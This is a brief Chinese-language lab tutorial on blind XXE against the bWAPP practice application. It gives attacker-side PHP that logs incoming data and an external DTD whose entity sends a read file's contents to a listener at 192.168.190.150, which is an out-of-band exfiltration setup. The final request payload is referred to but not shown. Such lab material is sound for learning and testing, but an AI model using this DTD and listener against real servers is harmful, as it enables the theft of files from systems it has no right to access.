文章資料來源於網絡,僅供參考,學習使用
復現盲型xxe
實驗環境:bwapp,xxe關,注釋掉了返回值
准備讀取的flag.txt文件為
通過利用服務器外帶數據方法步驟
1,攻擊機服務器新建兩個文件,一個php文件,一個dtd文件
php用來接收數據,代碼為:
<?php
$xxe = $_GET['xxe'];
$log = fopen('xxe.txt','a');
fwrite($log,$xxe.'\n');
fclose($log);
?>
dtd文件用來向php文件發起請求,文件里面的%;是html實體編碼代碼表示為%
<!ENTITY % xxe
"<!ENTITY % send SYSTEM 'http://192.168.190.150/test.php?xxe=%file;'>"
>
%xxe;
確定准備的兩個文件,都是可以訪問的
2,訪問有xxe漏洞的頁面,抓取數據包
3,發送如下數據包,雖然沒有顯示,但是可以到准備文件的服務器中,會建立有一個xxe.txt文件,寫入了xxe傳來的數據
數據已經寫入到攻擊機服務器中